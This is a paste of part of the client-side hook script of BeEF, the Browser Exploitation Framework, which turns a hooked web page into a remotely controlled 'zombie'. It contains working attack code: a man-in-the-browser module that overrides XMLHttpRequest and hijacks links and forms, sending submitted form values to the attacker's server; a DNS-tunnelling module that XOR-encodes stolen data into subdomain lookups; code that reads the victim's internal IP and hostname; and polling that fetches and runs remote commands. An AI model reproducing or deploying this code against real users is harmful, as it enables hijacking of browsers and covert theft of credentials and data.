  6198. return output;
  6199.  
  6200. },
  6201.  
  6202.  
  6203. utf8_encode : function (string) {
  6204. string = string.replace(/\r\n/g,"\n");
  6205. var utftext = "";
  6206.  
  6207. for (var n = 0; n < string.length; n++) {
  6208.  
  6209. var c = string.charCodeAt(n);
  6210.  
  6211. if (c < 128) {
  6212. utftext += String.fromCharCode(c);
  6213. }
  6214. else if((c > 127) && (c < 2048)) {
  6215. utftext += String.fromCharCode((c >> 6) | 192);
  6216. utftext += String.fromCharCode((c & 63) | 128);
  6217. }
  6218. else {
  6219. utftext += String.fromCharCode((c >> 12) | 224);
  6220. utftext += String.fromCharCode(((c >> 6) & 63) | 128);
  6221. utftext += String.fromCharCode((c & 63) | 128);
  6222. }
  6223.  
  6224. }
  6225.  
  6226. return utftext;
  6227. },
  6228.  
  6229. utf8_decode : function (utftext) {
  6230. var string = "";
  6231. var i = 0;
  6232. var c = c1 = c2 = 0;
  6233.  
  6234. while ( i < utftext.length ) {
  6235.  
  6236. c = utftext.charCodeAt(i);
  6237.  
  6238. if (c < 128) {
  6239. string += String.fromCharCode(c);
  6240. i++;
  6241. }
  6242. else if((c > 191) && (c < 224)) {
  6243. c2 = utftext.charCodeAt(i+1);
  6244. string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
  6245. i += 2;
  6246. }
  6247. else {
  6248. c2 = utftext.charCodeAt(i+1);
  6249. c3 = utftext.charCodeAt(i+2);
  6250. string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
  6251. i += 3;
  6252. }
  6253.  
  6254. }
  6255.  
  6256. return string;
  6257. }
  6258.  
  6259. };
  6260.  
  6261. beef.regCmp('beef.encode.base64');
  6262.  
  6263.  
  6264. //
  6265. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  6266. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  6267. // See the file 'doc/COPYING' for copying permission
  6268. //
  6269.  
  6270. // Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
  6271.  
  6272. beef.encode.json = {
  6273.  
  6274. stringify: function(o) {
  6275. if (typeof(JSON) == 'object' && JSON.stringify) {
  6276. // Error on stringifying cylcic structures caused polling to die
  6277. try {
  6278. s = JSON.stringify(o);
  6279. } catch(error) {
  6280. // TODO log error / handle cyclic structures?
  6281. }
  6282. return s;
  6283. }
  6284. var type = typeof(o);
  6285.  
  6286. if (o === null)
  6287. return "null";
  6288.  
  6289. if (type == "undefined")
  6290. return '\"\"';
  6291.  
  6292. if (type == "number" || type == "boolean")
  6293. return o + "";
  6294.  
  6295. if (type == "string")
  6296. return $j.quoteString(o);
  6297.  
  6298. if (type == 'object')
  6299. {
  6300. if (typeof o.toJSON == "function")
  6301. return $j.toJSON( o.toJSON() );
  6302.  
  6303. if (o.constructor === Date)
  6304. {
  6305. var month = o.getUTCMonth() + 1;
  6306. if (month < 10) month = '0' + month;
  6307.  
  6308. var day = o.getUTCDate();
  6309. if (day < 10) day = '0' + day;
  6310.  
  6311. var year = o.getUTCFullYear();
  6312.  
  6313. var hours = o.getUTCHours();
  6314. if (hours < 10) hours = '0' + hours;
  6315.  
  6316. var minutes = o.getUTCMinutes();
  6317. if (minutes < 10) minutes = '0' + minutes;
  6318.  
  6319. var seconds = o.getUTCSeconds();
  6320. if (seconds < 10) seconds = '0' + seconds;
  6321.  
  6322. var milli = o.getUTCMilliseconds();
  6323. if (milli < 100) milli = '0' + milli;
  6324. if (milli < 10) milli = '0' + milli;
  6325.  
  6326. return '"' + year + '-' + month + '-' + day + 'T' +
  6327. hours + ':' + minutes + ':' + seconds +
  6328. '.' + milli + 'Z"';
  6329. }
  6330.  
  6331. if (o.constructor === Array)
  6332. {
  6333. var ret = [];
  6334. for (var i = 0; i < o.length; i++)
  6335. ret.push( $j.toJSON(o[i]) || "null" );
  6336.  
  6337. return "[" + ret.join(",") + "]";
  6338. }
  6339.  
  6340. var pairs = [];
  6341. for (var k in o) {
  6342. var name;
  6343. var type = typeof k;
  6344.  
  6345. if (type == "number")
  6346. name = '"' + k + '"';
  6347. else if (type == "string")
  6348. name = $j.quoteString(k);
  6349. else
  6350. continue; //skip non-string or number keys
  6351.  
  6352. if (typeof o[k] == "function")
  6353. continue; //skip pairs where the value is a function.
  6354.  
  6355. var val = $j.toJSON(o[k]);
  6356.  
  6357. pairs.push(name + ":" + val);
  6358. }
  6359.  
  6360. return "{" + pairs.join(", ") + "}";
  6361. }
  6362. },
  6363.  
  6364. quoteString: function(string) {
  6365. if (string.match(this._escapeable))
  6366. {
  6367. return '"' + string.replace(this._escapeable, function (a)
  6368. {
  6369. var c = this._meta[a];
  6370. if (typeof c === 'string') return c;
  6371. c = a.charCodeAt();
  6372. return '\\u00' + Math.floor(c / 16).toString(16) + (c % 16).toString(16);
  6373. }) + '"';
  6374. }
  6375. return '"' + string + '"';
  6376. },
  6377.  
  6378. _escapeable: /["\\\x00-\x1f\x7f-\x9f]/g,
  6379.  
  6380. _meta : {
  6381. '\b': '\\b',
  6382. '\t': '\\t',
  6383. '\n': '\\n',
  6384. '\f': '\\f',
  6385. '\r': '\\r',
  6386. '"' : '\\"',
  6387. '\\': '\\\\'
  6388. }
  6389. };
  6390.  
  6391. $j.toJSON = function(o) {return beef.encode.json.stringify(o);};
  6392. $j.quoteString = function(o) {return beef.encode.json.quoteString(o);};
  6393.  
  6394. beef.regCmp('beef.encode.json');
  6395.  
  6396.  
  6397. //
  6398. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  6399. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  6400. // See the file 'doc/COPYING' for copying permission
  6401. //
  6402.  
  6403. /*!
  6404. * @literal object: beef.net.local
  6405. *
  6406. * Provides networking functions for the local/internal network of the zombie.
  6407. */
  6408. beef.net.local = {
  6409.  
  6410. sock: false,
  6411. checkJava: false,
  6412. hasJava: false,
  6413.  
  6414. /**
  6415. * Initializes the java socket. We have to use this method because
  6416. * some browsers do not have java installed or it is not accessible.
  6417. * in which case creating a socket directly generates an error. So this code
  6418. * is invalid:
  6419. * sock: new java.net.Socket();
  6420. */
  6421.  
  6422. initializeSocket: function() {
  6423. if(this.checkJava){
  6424. if(!beef.browser.hasJava()) {
  6425. this.checkJava=True;
  6426. this.hasJava=False;
  6427. return -1;
  6428. }else{
  6429. this.checkJava=True;
  6430. this.hasJava=True;
  6431. return 1;
  6432. }
  6433. }
  6434. else{
  6435. if(!this.hasJava) return -1;
  6436. else{
  6437. try {
  6438. this.sock = new java.net.Socket();
  6439. } catch(e) {
  6440. return -1;
  6441. }
  6442. return 1;
  6443. }
  6444. }
  6445. },
  6446.  
  6447. /**
  6448. * Returns the internal IP address of the zombie.
  6449. * @return: {String} the internal ip of the zombie.
  6450. * @error: return -1 if the internal ip cannot be retrieved.
  6451. */
  6452. getLocalAddress: function() {
  6453. if(!this.hasJava) return false;
  6454.  
  6455. this.initializeSocket();
  6456.  
  6457. try {
  6458. this.sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
  6459. this.sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
  6460.  
  6461. return this.sock.getLocalAddress().getHostAddress();
  6462. } catch(e) { return false; }
  6463. },
  6464.  
  6465. /**
  6466. * Returns the internal hostname of the zombie.
  6467. * @return: {String} the internal hostname of the zombie.
  6468. * @error: return -1 if the hostname cannot be retrieved.
  6469. */
  6470. getLocalHostname: function() {
  6471. if(!this.hasJava) return false;
  6472.  
  6473. this.initializeSocket();
  6474.  
  6475. try {
  6476. this.sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
  6477. this.sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
  6478.  
  6479. return this.sock.getLocalAddress().getHostName();
  6480. } catch(e) { return false; }
  6481. }
  6482.  
  6483. };
  6484.  
  6485. beef.regCmp('beef.net.local');
  6486.  
  6487.  
  6488. //
  6489. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  6490. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  6491. // See the file 'doc/COPYING' for copying permission
  6492. //
  6493.  
  6494. /**
  6495. * @literal object: beef.init
  6496. * Contains the beef_init() method which starts the BeEF client-side
  6497. * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
  6498. *
  6499. * If beef.pageIsLoaded is true, then this JS has been loaded >1 times
  6500. * and will have a new session id. The new session id will need to know
  6501. * the brwoser details. So sendback the browser details again.
  6502. */
  6503.  
  6504. beef.session.get_hook_session_id();
  6505.  
  6506. if (beef.pageIsLoaded) {
  6507. beef.net.browser_details();
  6508. }
  6509.  
  6510. window.onload = function () {
  6511. beef_init();
  6512. };
  6513.  
  6514. window.onpopstate = function (event) {
  6515. if (beef.onpopstate.length > 0) {
  6516. event.preventDefault;
  6517. for (var i = 0; i < beef.onpopstate.length; i++) {
  6518. var callback = beef.onpopstate[i];
  6519. try {
  6520. callback(event);
  6521. } catch (e) {
  6522. beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
  6523. }
  6524. return false;
  6525. }
  6526. }
  6527. };
  6528.  
  6529. window.onclose = function (event) {
  6530. if (beef.onclose.length > 0) {
  6531. event.preventDefault;
  6532. for (var i = 0; i < beef.onclose.length; i++) {
  6533. var callback = beef.onclose[i];
  6534. try {
  6535. callback(event);
  6536. } catch (e) {
  6537. beef.debug("window.onclose - couldn't execute callback: " + e.message);
  6538. }
  6539. return false;
  6540. }
  6541. }
  6542. };
  6543.  
  6544. /**
  6545. * Starts the polling mechanism, and initialize various components:
  6546. * - browser details (see browser.js) are sent back to the "/init" handler
  6547. * - the polling starts (checks for new commands, and execute them)
  6548. * - the logger component is initialized (see logger.js)
  6549. * - the Autorun Engine is initialized (see are.js)
  6550. */
  6551. function beef_init() {
  6552. if (!beef.pageIsLoaded) {
  6553. beef.pageIsLoaded = true;
  6554. if (beef.browser.hasWebSocket() && typeof beef.websocket != 'undefined') {
  6555. beef.websocket.start();
  6556. beef.net.browser_details();
  6557. beef.updater.execute_commands();
  6558. beef.logger.start();
  6559. beef.are.init();
  6560. }else {
  6561. beef.net.browser_details();
  6562. beef.updater.execute_commands();
  6563. beef.updater.check();
  6564. beef.logger.start();
  6565. beef.are.init();
  6566. }
  6567. }
  6568. }
  6569.  
  6570.  
  6571. //
  6572. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  6573. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  6574. // See the file 'doc/COPYING' for copying permission
  6575. //
  6576.  
  6577.  
  6578. beef.mitb = {
  6579.  
  6580. cid:null,
  6581. curl:null,
  6582.  
  6583. init:function (cid, curl) {
  6584. beef.mitb.cid = cid;
  6585. beef.mitb.curl = curl;
  6586. /*Override open method to intercept ajax request*/
  6587. var hook_file = "/hook.js";
  6588.  
  6589. if (window.XMLHttpRequest && !(window.ActiveXObject)) {
  6590.  
  6591. beef.mitb.sniff("Method XMLHttpRequest.open override");
  6592. (function (open) {
  6593. XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
  6594. // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
  6595. // or a request initiated by the MiTB itself.
  6596. if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
  6597. open.call(this, method, url, async, true);
  6598. }else {
  6599. var portRegex = new RegExp(":[0-9]+");
  6600. var portR = portRegex.exec(url);
  6601. var requestPort;
  6602. if (portR != null) { requestPort = portR[0].split(":")[1]; }
  6603.  
  6604. //GET request
  6605. if (method == "GET") {
  6606. //GET request -> cross-domain
  6607. if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
  6608. beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
  6609. window.open(url);
  6610. }else { //GET request -> same-domain
  6611. beef.mitb.sniff("GET [Ajax Request]: " + url);
  6612. if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
  6613. var title = "";
  6614. if (document.getElementsByTagName("title").length == 0) {
  6615. title = document.title;
  6616. } else {
  6617. title = document.getElementsByTagName("title")[0].innerHTML;
  6618. }
  6619. // write the url of the page
  6620. history.pushState({ Be:"EF" }, title, url);
  6621. }
  6622. }
  6623. }else{
  6624. //POST request
  6625. beef.mitb.sniff("POST ajax request to: " + url);
  6626. open.call(this, method, url, async, true);
  6627. }
  6628. }
  6629. };
  6630. })(XMLHttpRequest.prototype.open);
  6631. }
  6632. },
  6633.  
  6634. // Initializes the hook on anchors and forms.
  6635. hook:function () {
  6636. beef.onpopstate.push(function (event) {
  6637. beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
  6638. });
  6639. beef.onclose.push(function (event) {
  6640. beef.mitb.endSession();
  6641. });
  6642.  
  6643. var anchors = document.getElementsByTagName("a");
  6644. var forms = document.getElementsByTagName("form");
  6645. var lis = document.getElementsByTagName("li");
  6646.  
  6647. for (var i = 0; i < anchors.length; i++) {
  6648. anchors[i].onclick = beef.mitb.poisonAnchor;
  6649. }
  6650. for (var i = 0; i < forms.length; i++) {
  6651. beef.mitb.poisonForm(forms[i]);
  6652. }
  6653.  
  6654. for (var i = 0; i < lis.length; i++) {
  6655. if (lis[i].hasAttribute("onclick")) {
  6656. lis[i].removeAttribute("onclick");
  6657. /*clear*/
  6658. lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
  6659. /*override*/
  6660.  
  6661. }
  6662. }
  6663. },
  6664.  
  6665. // Hooks anchors and prevents them from linking away
  6666. poisonAnchor:function (e) {
  6667. try {
  6668. e.preventDefault;
  6669. if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
  6670. var title = "";
  6671. if (document.getElementsByTagName("title").length == 0) {
  6672. title = document.title;
  6673. } else {
  6674. title = document.getElementsByTagName("title")[0].innerHTML;
  6675. }
  6676. history.pushState({ Be:"EF" }, title, e.currentTarget);
  6677. }
  6678. } catch (e) {
  6679. console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
  6680. }
  6681. return false;
  6682. },
  6683.  
  6684. // Hooks forms and prevents them from linking away
  6685. poisonForm:function (form) {
  6686. form.onsubmit = function (e) {
  6687. var inputs = form.getElementsByTagName("input");
  6688. var query = "";
  6689. for (var i = 0; i < inputs.length; i++) {
  6690. if (i > 0 && i < inputs.length - 1) query += "&";
  6691. switch (inputs[i].type) {
  6692. case "submit":
  6693. break;
  6694. default:
  6695. query += inputs[i].name + "=" + inputs[i].value;
  6696. break;
  6697. }
  6698. }
  6699. e.preventdefault;
  6700. beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
  6701. history.pushState({ Be:"EF" }, "", form.action);
  6702. return false;
  6703. }
  6704. },
  6705.  
  6706. // Fetches a hooked form with AJAX
  6707. fetchForm:function (url, query, target) {
  6708. try {
  6709. var y = new XMLHttpRequest();
  6710. y.open('POST', url, false, true);
  6711. y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  6712. y.onreadystatechange = function () {
  6713. if (y.readyState == 4 && y.responseText != "") {
  6714. target.innerHTML = y.responseText;
  6715. setTimeout(beef.mitb.hook, 10);
  6716. }
  6717. };
  6718. y.send(query);
  6719. beef.mitb.sniff("POST: " + url + "[" + query + "]");
  6720. return true;
  6721. } catch (x) {
  6722. return false;
  6723. }
  6724. },
  6725.  
  6726. // Fetches a hooked link with AJAX
  6727. fetch:function (url, target) {
  6728. try {
  6729. var y = new XMLHttpRequest();
  6730. y.open('GET', url, false, true);
  6731. y.onreadystatechange = function () {
  6732. if (y.readyState == 4 && y.responseText != "") {
  6733. target.innerHTML = y.responseText;
  6734. setTimeout(beef.mitb.hook, 10);
  6735. }
  6736. };
  6737. y.send(null);
  6738. beef.mitb.sniff("GET: " + url);
  6739. return true;
  6740. } catch (x) {
  6741. window.open(url);
  6742. beef.mitb.sniff("GET [New Window]: " + url);
  6743. return false;
  6744. }
  6745. },
  6746.  
  6747. // Fetches a window.location=http://domainname.com and setting up history
  6748. fetchOnclick:function (url) {
  6749. try {
  6750. var target = document.getElementsByTagName("html")[0];
  6751. var y = new XMLHttpRequest();
  6752. y.open('GET', url, false, true);
  6753. y.onreadystatechange = function () {
  6754. if (y.readyState == 4 && y.responseText != "") {
  6755. var title = "";
  6756. if (document.getElementsByTagName("title").length == 0) {
  6757. title = document.title;
  6758. }
  6759. else {
  6760. title = document.getElementsByTagName("title")[0].innerHTML;
  6761. }
  6762. history.pushState({ Be:"EF" }, title, url);
  6763. target.innerHTML = y.responseText;
  6764. setTimeout(beef.mitb.hook, 10);
  6765. }
  6766. };
  6767. y.send(null);
  6768. beef.mitb.sniff("GET: " + url);
  6769.  
  6770. } catch (x) {
  6771. // the link is cross-domain, so load the resource in a different tab
  6772. window.open(url);
  6773. beef.mitb.sniff("GET [New Window]: " + url);
  6774. }
  6775. },
  6776.  
  6777. // Relays an entry to the framework
  6778. sniff:function (result) {
  6779. try {
  6780. beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
  6781. } catch (x) {
  6782. }
  6783. return true;
  6784. },
  6785.  
  6786. // Signals the Framework that the user has lost the hook
  6787. endSession:function () {
  6788. beef.mitb.sniff("Window closed.");
  6789. }
  6790. };
  6791.  
  6792. beef.regCmp('beef.mitb');
  6793.  
  6794. //
  6795. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  6796. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  6797. // See the file 'doc/COPYING' for copying permission
  6798. //
  6799.  
  6800. /*!
  6801. * @literal object: beef.net.dns
  6802. *
  6803. * request object structure:
  6804. * + msgId: {Integer} Unique message ID for the request.
  6805. * + domain: {String} Remote domain to retrieve the data.
  6806. * + wait: {Integer} Wait time between requests (milliseconds) - NOT IMPLEMENTED
  6807. * + callback: {Function} Callback function to receive the number of requests sent.
  6808. */
  6809.  
  6810. beef.net.dns = {
  6811.  
  6812. handler: "dns",
  6813.  
  6814. send: function(msgId, messageString, domain, wait, callback) {
  6815.  
  6816. var dom = document.createElement('b');
  6817.  
  6818. // DNS settings
  6819. var max_domain_length = 255-5-5-5-5-5;
  6820. var max_segment_length = max_domain_length - domain.length;
  6821.  
  6822. // splits strings into chunks
  6823. String.prototype.chunk = function(n) {
  6824. if (typeof n=='undefined') n=100;
  6825. return this.match(RegExp('.{1,'+n+'}','g'));
  6826. };
  6827.  
  6828. // XORs a string
  6829. xor_encrypt = function(str, key) {
  6830. var result="";
  6831. for(i=0;i<str.length;++i) {
  6832. result+=String.fromCharCode(key^str.charCodeAt(i));
  6833. }
  6834. return result;
  6835. };
  6836.  
  6837. // sends a DNS request
  6838. sendQuery = function(query) {
  6839. beef.debug("Requesting: "+query);
  6840. var img = new Image;
  6841. img.src = "http://"+query;
  6842. img.onload = function() { dom.removeChild(this); }
  6843. img.onerror = function() { dom.removeChild(this); }
  6844. dom.appendChild(img);
  6845. };
  6846.  
  6847. // encode message
  6848. var xor_key = Math.floor(Math.random()*99000+1000);
  6849. encoded_message = encodeURI(xor_encrypt(messageString, xor_key)).replace(/%/g,".");
  6850.  
  6851. // Split message into segments
  6852. segments = encoded_message.chunk(max_segment_length)
  6853. for (seq=1; seq<=segments.length; seq++) {
  6854. // send segment
  6855. sendQuery(msgId+"."+seq+"."+segments.length+"."+xor_key+segments[seq-1]+"."+domain);
  6856. }
  6857.  
  6858. // callback - returns the number of queries sent
  6859. if (!!callback) callback(segments.length);
  6860.  
  6861. }
  6862.  
  6863. };
  6864.  
  6865. beef.regCmp('beef.net.dns');
  6866.  
  6867.  
  6868.  
  6869. beef.net.cors = {
  6870.  
  6871. handler: "cors",
  6872.  
  6873. /**
  6874. * Response Object - used in the beef.net.request callback
  6875. */
  6876. response:function () {
  6877. this.status = null; // 500, 404, 200, 302, etc
  6878. this.headers = null; // full response headers
  6879. this.body = null; // full response body
  6880. },
  6881.  
  6882. /**
  6883. * Make a cross-domain request using CORS
  6884. *
  6885. * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
  6886. * @param url {String} url
  6887. * @param data {String} request body
  6888. * @param callback {Function} function to callback on completion
  6889. */
  6890. request: function(method, url, data, callback) {
  6891.  
  6892. var xhr;
  6893. var response = new this.response;
  6894.  
  6895. if (XMLHttpRequest) {
  6896. xhr = new XMLHttpRequest();
  6897.  
  6898. if ('withCredentials' in xhr) {
  6899. xhr.open(method, url, true);
  6900. xhr.onerror = function() {
  6901. };
  6902. xhr.onreadystatechange = function() {
  6903. if (xhr.readyState === 4) {
  6904. response.headers = this.getAllResponseHeaders()
  6905. response.body = this.responseText;
  6906. response.status = this.status;
  6907. if (!!callback) {
  6908. if (!!response) {
  6909. callback(response);
  6910. } else {
  6911. callback('ERROR: No Response. CORS requests may be denied for this resource.')
  6912. }
  6913. }
  6914. }
  6915. };
  6916. xhr.send(data);
  6917. }
  6918. } else if (typeof XDomainRequest != "undefined") {
  6919. xhr = new XDomainRequest();
  6920. xhr.open(method, url);
  6921. xhr.onerror = function() {
  6922. };
  6923. xhr.onload = function() {
  6924. response.headers = this.getAllResponseHeaders()
  6925. response.body = this.responseText;
  6926. response.status = this.status;
  6927. if (!!callback) {
  6928. if (!!response) {
  6929. callback(response);
  6930. } else {
  6931. callback('ERROR: No Response. CORS requests may be denied for this resource.')
  6932. }
  6933. }
  6934. };
  6935. xhr.send(data);
  6936. } else {
  6937. if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
  6938. }
  6939.  
  6940. }
  6941.  
  6942. };
  6943.  
  6944. beef.regCmp('beef.net.cors');
  6945.  
  6946.  
  6947.  
  6948. //
  6949. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  6950. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  6951. // See the file 'doc/COPYING' for copying permission
  6952. //
  6953.  
  6954. beef.are = {
  6955. init:function(){
  6956. var Jools = require('jools');
  6957. this.ruleEngine = new Jools();
  6958. },
  6959. send:function(module){
  6960. // there will probably be some other stuff here before things are finished
  6961. this.commands.push(module);
  6962. },
  6963. execute:function(inputs){
  6964. this.rulesEngine.execute(input);
  6965. },
  6966. cache_modules:function(modules){},
  6967. rules:[
  6968. {
  6969. 'name':"exec_no_input",
  6970. 'condition':function(command,browser){
  6971. //need to figure out how to handle the inputs
  6972. return (!command['inputs'] || command['inputs'].length == 0)
  6973. },
  6974. 'consequence':function(command,browser){}
  6975. },
  6976. {
  6977. 'name':"module_has_sibling",
  6978. 'condition':function(command,commands){
  6979. return false;
  6980. },
  6981. 'consequence':function(command,commands){}
  6982. },
  6983. {
  6984. 'name':"module_depends_on_module",
  6985. 'condition':function(command,commands){
  6986. return false;
  6987. },
  6988. 'consequence':function(command,commands){}
  6989. }
  6990. ],
  6991. commands:[],
  6992. results:[]
  6993. };
  6994. beef.regCmp("beef.are");
  6995.  
  6996.  
  6997. //
  6998. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  6999. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  7000. // See the file 'doc/COPYING' for copying permission
  7001. //
  7002.  
  7003. /*
  7004. Sometimes there are timing issues and looks like beef_init
  7005. is not called at all (always in cross-domain situations,
  7006. for example calling the hook with jquery getScript,
  7007. or sometimes with event handler injections).
  7008.  
  7009. To fix this, we call again beef_init after 1 second.
  7010. Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
  7011. antisnatchor
  7012. */
  7013. setTimeout(beef_init, 1000);
Add Comment
Please, Sign In to add comment